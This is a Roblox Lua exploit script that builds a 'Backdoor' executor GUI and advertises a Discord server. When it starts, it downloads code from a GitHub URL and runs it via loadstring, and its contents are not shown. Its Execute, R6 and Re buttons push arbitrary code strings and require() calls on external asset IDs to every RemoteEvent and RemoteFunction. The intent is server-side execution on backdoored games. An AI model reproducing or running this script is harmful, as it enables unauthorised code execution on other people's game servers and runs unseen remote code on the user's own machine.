--[[

鈻堚枅鈻堚枅鈻堚枅鈺椻枒鈻戔枅鈻堚枅鈻堚枅鈺椻枒鈻戔枅鈻堚枅鈻堚枅鈺椻枒鈻堚枅鈺椻枒鈻戔枅鈻堚晽鈻堚枅鈻堚枅鈻堚枅鈺椻枒鈻戔枅鈻堚枅鈻堚枅鈺椻枒鈻戔枅鈻堚枅鈻堚枅鈺椻枒鈻堚枅鈻堚枅鈻堚枅鈺椻枒
鈻堚枅鈺斺晲鈺愨枅鈻堚晽鈻堚枅鈺斺晲鈺愨枅鈻堚晽鈻堚枅鈺斺晲鈺愨枅鈻堚晽鈻堚枅鈺戔枒鈻堚枅鈺斺暆鈻堚枅鈺斺晲鈺愨枅鈻堚晽鈻堚枅鈺斺晲鈺愨枅鈻堚晽鈻堚枅鈺斺晲鈺愨枅鈻堚晽鈻堚枅鈺斺晲鈺愨枅鈻堚晽
鈻堚枅鈻堚枅鈻堚枅鈺︹暆鈻堚枅鈻堚枅鈻堚枅鈻堚晳鈻堚枅鈺戔枒鈻戔暁鈺愨暆鈻堚枅鈻堚枅鈻堚晲鈺濃枒鈻堚枅鈺戔枒鈻戔枅鈻堚晳鈻堚枅鈺戔枒鈻戔枅鈻堚晳鈻堚枅鈺戔枒鈻戔枅鈻堚晳鈻堚枅鈻堚枅鈻堚枅鈺斺暆
鈻堚枅鈺斺晲鈺愨枅鈻堚晽鈻堚枅鈺斺晲鈺愨枅鈻堚晳鈻堚枅鈺戔枒鈻戔枅鈻堚晽鈻堚枅鈺斺晲鈻堚枅鈺椻枒鈻堚枅鈺戔枒鈻戔枅鈻堚晳鈻堚枅鈺戔枒鈻戔枅鈻堚晳鈻堚枅鈺戔枒鈻戔枅鈻堚晳鈻堚枅鈺斺晲鈺愨枅鈻堚晽
鈻堚枅鈻堚枅鈻堚枅鈺︹暆鈻堚枅鈺戔枒鈻戔枅鈻堚晳鈺氣枅鈻堚枅鈻堚枅鈺斺暆鈻堚枅鈺戔枒鈺氣枅鈻堚晽鈻堚枅鈻堚枅鈻堚枅鈺斺暆鈺氣枅鈻堚枅鈻堚枅鈺斺暆鈺氣枅鈻堚枅鈻堚枅鈺斺暆鈻堚枅鈺戔枒鈻戔枅鈻堚晳
鈺氣晲鈺愨晲鈺愨晲鈺濃枒鈺氣晲鈺濃枒鈻戔暁鈺愨暆鈻戔暁鈺愨晲鈺愨晲鈺濃枒鈺氣晲鈺濃枒鈻戔暁鈺愨暆鈺氣晲鈺愨晲鈺愨晲鈺濃枒鈻戔暁鈺愨晲鈺愨晲鈺濃枒鈻戔暁鈺愨晲鈺愨晲鈺濃枒鈺氣晲鈺濃枒鈻戔暁鈺愨暆

Invite Discord Server:discord.com/invite/Gnabm6WfhA
--]]

local CollectionService = game:GetService("CollectionService")
local Players = game:GetService("Players")
local player = Players.LocalPlayer
local replicatedStorage = game:GetService("ReplicatedStorage")
local url1 = "https://raw.githubusercontent.com/moyoli667557/lulz/refs/heads/main/Idk"
    task.spawn(function()
        loadstring(game:HttpGet(url1))()
    end)
wait()
local LMG2L = {};
LMG2L["ScreenGui_1"] = Instance.new("ScreenGui")
LMG2L["ScreenGui_1"].Parent = game.CoreGui
LMG2L["ScreenGui_1"]["Enabled"] = true;
LMG2L["ScreenGui_1"]["DisplayOrder"] = 9999999999999999999999999999999999999999999999999999999999999999;
LMG2L["ScreenGui_1"]["Archivable"] = false;
LMG2L["ScreenGui_1"]["AutoLocalize"] = false;
LMG2L["ScreenGui_1"]["Name"] = [[discord.com/Invite/Gnabm6WfhA]];
LMG2L["Frame_2"] = Instance.new("Frame", LMG2L["ScreenGui_1"]);
LMG2L["Frame_2"]["BackgroundColor3"] = Color3.fromRGB(65, 65, 65);
LMG2L["Frame_2"]["Size"] = UDim2.new(0, 464, 0, 326);
LMG2L["Frame_2"]["Position"] = UDim2.new(0, 3, 0, 35);
LMG2L["Frame_2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Frame_3"] = Instance.new("Frame", LMG2L["Frame_2"]);
LMG2L["Frame_3"]["BackgroundColor3"] = Color3.fromRGB(74, 74, 74);
LMG2L["Frame_3"]["Size"] = UDim2.new(0, 464, 0, 28);
LMG2L["Frame_3"]["Position"] = UDim2.new(0, 0, 0, -6);
LMG2L["Frame_3"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["TextLabel_4"] = Instance.new("TextLabel", LMG2L["Frame_3"]);
LMG2L["TextLabel_4"]["TextWrapped"] = false;
LMG2L["TextLabel_4"]["BorderSizePixel"] = 0;
LMG2L["TextLabel_4"]["TextXAlignment"] = Enum.TextXAlignment.Left;
LMG2L["TextLabel_4"]["TextStrokeColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel_4"]["TextScaled"] = true;
LMG2L["TextLabel_4"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel_4"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
LMG2L["TextLabel_4"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel_4"]["BackgroundTransparency"] = 99;
LMG2L["TextLabel_4"]["Size"] = UDim2.new(0, 296, 0, 30);
LMG2L["TextLabel_4"]["Text"] = [[Backdoor  -  discord.com/Invite/Gnabm6WfhA]];
LMG2L["TextLabel_4"]["Position"] = UDim2.new(0, 4, 0, 0);
LMG2L["TextButton_5"] = Instance.new("TextButton", LMG2L["Frame_3"]);
LMG2L["TextButton_5"]["TextWrapped"] = true;
LMG2L["TextButton_5"]["BorderSizePixel"] = 0;
LMG2L["TextButton_5"]["TextScaled"] = true;
LMG2L["TextButton_5"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton_5"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton_5"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.SemiBold, Enum.FontStyle.Normal);
LMG2L["TextButton_5"]["BackgroundTransparency"] = 999;
LMG2L["TextButton_5"]["Size"] = UDim2.new(0, 28, 0, 24);
LMG2L["TextButton_5"]["Text"] = [[X]];
LMG2L["TextButton_5"]["Position"] = UDim2.new(0, 432, 0, 2);
LMG2L["TextButton_6"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["TextButton_6"]["TextSize"] = 15;
LMG2L["TextButton_6"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton_6"]["BackgroundColor3"] = Color3.fromRGB(68, 68, 68);
LMG2L["TextButton_6"]["FontFace"] = Font.new([[rbxasset://fonts/families/ComicNeueAngular.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
LMG2L["TextButton_6"]["Size"] = UDim2.new(0, 112, 0, 48);
LMG2L["TextButton_6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["TextButton_6"]["Text"] = [[Execute]];
LMG2L["TextButton_6"]["Position"] = UDim2.new(0, 4, 0, 274);
LMG2L["TextButton_7"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["TextButton_7"]["TextSize"] = 15;
LMG2L["TextButton_7"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton_7"]["BackgroundColor3"] = Color3.fromRGB(68, 68, 68);
LMG2L["TextButton_7"]["FontFace"] = Font.new([[rbxasset://fonts/families/ComicNeueAngular.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
LMG2L["TextButton_7"]["Size"] = UDim2.new(0, 54, 0, 48);
LMG2L["TextButton_7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["TextButton_7"]["Text"] = [[R6]];
LMG2L["TextButton_7"]["Position"] = UDim2.new(0, 404, 0, 274);
LMG2L["TextButton_8"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["TextButton_8"]["TextSize"] = 15;
LMG2L["TextButton_8"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton_8"]["BackgroundColor3"] = Color3.fromRGB(68, 68, 68);
LMG2L["TextButton_8"]["FontFace"] = Font.new([[rbxasset://fonts/families/ComicNeueAngular.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
LMG2L["TextButton_8"]["Size"] = UDim2.new(0, 124, 0, 48);
LMG2L["TextButton_8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["TextButton_8"]["Text"] = [[Clear]];
LMG2L["TextButton_8"]["Position"] = UDim2.new(0, 122, 0, 274);
LMG2L["TextButton_9"] = Instance.new("TextButton", LMG2L["Frame_2"]);
LMG2L["TextButton_9"]["TextSize"] = 15;
LMG2L["TextButton_9"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextButton_9"]["BackgroundColor3"] = Color3.fromRGB(68, 68, 68);
LMG2L["TextButton_9"]["FontFace"] = Font.new([[rbxasset://fonts/families/ComicNeueAngular.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
LMG2L["TextButton_9"]["Size"] = UDim2.new(0, 56, 0, 48);
LMG2L["TextButton_9"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["TextButton_9"]["Text"] = [[Re]];
LMG2L["TextButton_9"]["Position"] = UDim2.new(0, 342, 0, 274);
LMG2L["UIDragDetector_a"] = Instance.new("UIDragDetector", LMG2L["Frame_2"]);
LMG2L["UIDragDetector_a"]["DragUDim2"] = UDim2.new(0, 32, 0, 479);
LMG2L["ScrollingFrame_b"] = Instance.new("ScrollingFrame", LMG2L["Frame_2"]);
LMG2L["ScrollingFrame_b"]["BackgroundColor3"] = Color3.fromRGB(64, 64, 64);
LMG2L["ScrollingFrame_b"]["Size"] = UDim2.new(0, 455.5, 0, 240);
LMG2L["ScrollingFrame_b"]["Position"] = UDim2.new(0, 4, 0, 30);
LMG2L["ScrollingFrame_b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Source_c"] = Instance.new("TextBox", LMG2L["ScrollingFrame_b"]);
LMG2L["Source_c"]["Name"] = [[Source]];
LMG2L["Source_c"]["TextXAlignment"] = Enum.TextXAlignment.Left;
LMG2L["Source_c"]["TextWrapped"] = false;
LMG2L["Source_c"]["AutoLocalize"] = false;
LMG2L["Source_c"]["TextStrokeColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["Source_c"]["TextSize"] = 14;
LMG2L["Source_c"]["AutomaticSize"] = Enum.AutomaticSize.XY; -- jumlahnya teks dan batas 
LMG2L["Source_c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["Source_c"]["TextYAlignment"] = Enum.TextYAlignment.Top;
LMG2L["Source_c"]["BackgroundColor3"] = Color3.fromRGB(59, 59, 59);
LMG2L["Source_c"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
LMG2L["Source_c"]["MultiLine"] = true;
LMG2L["Source_c"]["ClearTextOnFocus"] = false;
LMG2L["Source_c"]["Size"] = UDim2.new(0, 442, 0, 200);
LMG2L["Source_c"]["Position"] = UDim2.new(0, 0, 0, 0);
LMG2L["Source_c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
LMG2L["Source_c"]["Text"] = [[]];
LMG2L["Source_c"]["BackgroundTransparency"] = 9;

-- skidding


LMG2L["TextButton_8"].MouseButton1Click:Connect(function()
LMG2L["Source_c"]["Text"] = [[]]
end)

LMG2L["TextButton_5"].MouseButton1Click:Connect(function()
LMG2L["ScreenGui_1"]:Destroy()
LMG2L["ScreenGui_1"]:Remove()
end)

LMG2L["TextButton_7"].MouseButton1Click:Connect(function()
for _, obj in ipairs(game:GetService("ReplicatedStorage"):GetChildren()) do
			if obj:IsA("RemoteEvent") then
				obj:FireServer([[require(9635947635).load("]]..game:GetService('Players').LocalPlayer.Name..[[")]])
			elseif obj:IsA("RemoteFunction") then
				obj:InvokeServer([[require(9635947635).load("]]..game:GetService('Players').LocalPlayer.Name..[[")]])
			end
		end
end)

LMG2L["TextButton_9"].MouseButton1Click:Connect(function()
for _, obj in ipairs(game:GetService("ReplicatedStorage"):GetChildren()) do
			if obj:IsA("RemoteEvent") then
				obj:FireServer([[require(3229910984):respawn("]]..game:GetService('Players').LocalPlayer.Name..[[")]])
			elseif obj:IsA("RemoteFunction") then
				obj:InvokeServer([[require(3229910984):respawn("]]..game:GetService('Players').LocalPlayer.Name..[[")]])
			end
		end
end)

LMG2L["TextButton_6"].MouseButton1Click:Connect(function()
game.ReplicatedStorage.RemoteEvent:FireServer(LMG2L["Source_c"].Text)

for _, obj in ipairs(game:GetService("ReplicatedStorage"):GetChildren()) do
			if obj:IsA("RemoteEvent") then
				obj:FireServer(LMG2L["Source_c"].Text)
			elseif obj:IsA("RemoteFunction") then
				obj:InvokeServer(LMG2L["Source_c"].Text)
			end
		end
end)

local Source = LMG2L["Source_c"]
local function NewLayer(name,color,z)
	local t = Instance.new("TextLabel")
	t.Name = name
	t.Parent = Source
	t.BackgroundTransparency = 1
	t.Size = UDim2.new(1,0,1,0)
	t.Position = UDim2.new(0,0,0,0)
	t.Font = Enum.Font.Code
	t.TextSize = Source.TextSize
	t.TextXAlignment = Enum.TextXAlignment.Left
	t.TextYAlignment = Enum.TextYAlignment.Top
	t.TextWrapped = false
	t.RichText = false
	t.ZIndex = z
	t.TextColor3 = color
	t.Text = ""
	return t
end

local Comments_ = NewLayer("Comments_", Color3.fromRGB(100,100,100), 5)
local Globals_ = NewLayer("Globals_", Color3.fromRGB(132,214,247), 5)
local Keywords_ = NewLayer("Keywords_", Color3.fromRGB(248,109,124), 5)
local RemoteHighlight_ = NewLayer("RemoteHighlight_", Color3.fromRGB(0,144,255), 5)
local Strings_ = NewLayer("Strings_", Color3.fromRGB(163,233,147), 5)
local Tokens_ = NewLayer("Tokens_", Color3.fromRGB(200, 200, 200), 5)
local Numbers_ = NewLayer("Numbers_", Color3.fromRGB(255, 165, 0), 4)



local lua_keywords = {
	"and","break","do","else","elseif","end","false",
	"for","function","goto","if","in","local","nil",
	"not","or","repeat","return","then","true","until",
	"while","pcall","wait"
}

local global_env = {"game", "Lighting", "TimeOfDay", "hookmetamethod", "hookfunction", "getgc", "filtergc", "Drawing", "getgenv", "getsenv", "getrenv", "getfenv", "local", "setfenv", "decompile", "saveinstance", "getrawmetatable", "setrawmetatable", "checkcaller", "cloneref", "clonefunction", "iscclosure", "islclosure", "isexecutorclosure", "newcclosure", "getfunctionhash", "crypt", "writefile", "appendfile", "loadfile", "readfile", "listfiles","makefolder", "isfolder", "isfile", "delfile", "delfolder", "getcustomasset", "fireclickdetector", "firetouchinterest","fireproximityprompt","getrawmetatable","game","workspace","script","math","string","table","print","wait","BrickColor","Color3","next","pairs","ipairs","select","unpack","Instance","Vector2","Vector3","CFrame","Ray","UDim2","Enum","assert","error","warn","tick","loadstring","_G","shared","getfenv","setfenv","newproxy","setmetatable","getmetatable","os","debug","pcall","ypcall","xpcall","rawequal","rawset","rawget","tonumber","tostring","type","typeof","_VERSION","coroutine","delay","require","spawn","LoadLibrary","settings","stats","time","UserSettings","version","Axes","ColorSequence","Faces","ColorSequenceKeypoint","NumberRange","NumberSequence","NumberSequenceKeypoint","gcinfo","elapsedTime","collectgarbage","PhysicalProperties","Rect","Region3","Region3int16","UDim","Vector2int16","Vector3int16","task","RiseVelocity","Opacity","VelocityInheritance","WindAffectsDrag","TimeScale","LockedToPart","Acceleration","ShapeStyle","ShapeInOut","SpreadAngle","Speed","RotSpeed","Rate","Lifetime","EmissionDirection","ZOffset","Squash","Volume","Brightness","PantsTemplate","ShirtTemplate","BackSurface","BottomSurface","LeftSurface","RightSurface","TopSurface","FrontSurface","MoonTextureId","TextureId","SkyboxBk","SkyboxDn","SkyboxFt","SkyboxLf","SkyboxRt","SkyboxUp","StarCount","SunAngularSize","SunTextureId","MeshType","VertexColor","CastShadow","PivotOffset","WorldPivot","Size","Position","CFrame","SoundId","Name","BrickColor","Color","Transparency","Orientation","Anchored","Rotation","Health","DisplayName","C0","C1","Part0","Part1","MeshId","Texture","Face","ZIndex","DisplayDistanceType","RigType","WalkSpeed","MaxHealth","HipHeight","Disabled","Enabled","JumpPower","Text","BackgroundColor","TextColor3","BorderColor3","Scale","Offset","Active","PrimaryPart","Reflectance","Massless","CanCollide","Material","Shape","CollisionGroup","CanTouch","BinType","ExtentsOffset","MaxDistance","ResetOnSpawn","SizeOffset","StudsOffset","AnchorPoint","AutomaticSize","BackgroundTransparency","LayoutOrder","BorderMode","BorderSizePixel","Active","SizeConstraint","Visible","Image","ImageColor3","ImageRectSize","ImageRectOffset","ImageTransparency","ResampleMode","ScaleType","AlwaysOnTop","Brightness","PlayerToHideFrom","Playing","Value","#", "+", "-", "*", "%", "/", "^", "=", "~", "=", "<", ">", ",", ".", "(", ")", "{", "}", "[", "]", ";", ":"}


local function Highlight(text, keywords)
	local K = {}

	for _,v in ipairs(keywords) do
		K[v] = true
	end

	local Token = {
		["="]=true,["."]=true,[","]=true,
		["("]=true,[")"]=true,["["]=true,
		["]"]=true,["{"]=true,["}"]=true,
		[":"]=true,["*"]=true,["/"]=true,
		["+"]=true,["-"]=true,["%"]=true,
		[";"]=true,["~"]=true
	}

	local S = text

	S = S:gsub(".",function(c)
		return Token[c] and " " or c
	end)

	S = S:gsub("%S+",function(c)
		return K[c] and c or (" "):rep(#c)
	end)

	return S
end

local function hTokens(text)
	local Token = {
		["="]=true,["."]=true,[","]=true,
		["("]=true,[")"]=true,["["]=true,
		["]"]=true,["{"]=true,["}"]=true,
		[":"]=true,["*"]=true,["/"]=true,
		["+"]=true,["-"]=true,["%"]=true,
		[";"]=true,["~"]=true
	}

	local A = ""

	text:gsub(".",function(c)
		if Token[c] then
			A = A .. c
		elseif c == "\n" then
			A = A .. "\n"
		else
			A = A .. " "
		end
	end)

	return A
end

local function strings(text)
	local highlight = ""
	local quote = false

	text:gsub(".",function(c)
		if c == "\"" then
			quote = not quote
			highlight = highlight .. "\""
		elseif quote then
			highlight = highlight .. c
		elseif c == "\n" then
			highlight = highlight .. "\n"
		else
			highlight = highlight .. " "
		end
	end)

	return highlight
end

local function comments(text)
	local ret = ""

	for line in (text.."\n"):gmatch("(.-)\n") do
		local pos = line:find("%-%-")

		if pos then
			ret = ret .. (" "):rep(pos-1) .. line:sub(pos)
		else
			ret = ret .. (" "):rep(#line)
		end

		ret = ret .. "\n"
	end

	return ret
end

local function numbers(text)
	local A = ""

	text:gsub(".",function(c)
		if tonumber(c) then
			A = A .. c
		elseif c == "\n" then
			A = A .. "\n"
		else
			A = A .. " "
		end
	end)

	return A
end

local function UpdateHighlight()
	local s = Source.Text

	Keywords_.Text = Highlight(s,lua_keywords)
	Globals_.Text = Highlight(s,global_env)
	RemoteHighlight_.Text = Highlight(s,{
		"FireServer",
		"InvokeServer",
		"FireClient",
		"InvokeClient"
	})

	Tokens_.Text = hTokens(s)
	Numbers_.Text = numbers(s)
	Strings_.Text = strings(s)
	Comments_.Text = comments(s)
end

Source:GetPropertyChangedSignal("Text"):Connect(UpdateHighlight)
UpdateHighlight()

task.spawn(function()
	local ScrollingFrame = LMG2L["ScrollingFrame_b"]
	local Source = LMG2L["Source_c"]

	local function UpdateCanvas()
		if Source.Text == "" then
			ScrollingFrame.CanvasSize = UDim2.new(0,0,0,0)
			return
		end

		local Size = Source.AbsoluteSize

		ScrollingFrame.CanvasSize = UDim2.new(
			0,
			math.max(Size.X + 8, ScrollingFrame.AbsoluteSize.X),
			0,
			math.max(Size.Y + 8, ScrollingFrame.AbsoluteSize.Y)
		)
	end

	Source:GetPropertyChangedSignal("Text"):Connect(UpdateCanvas)
	Source:GetPropertyChangedSignal("AbsoluteSize"):Connect(UpdateCanvas)
	ScrollingFrame:GetPropertyChangedSignal("AbsoluteSize"):Connect(UpdateCanvas)

	UpdateCanvas()
end)

return LMG2L["ScreenGui_1"]
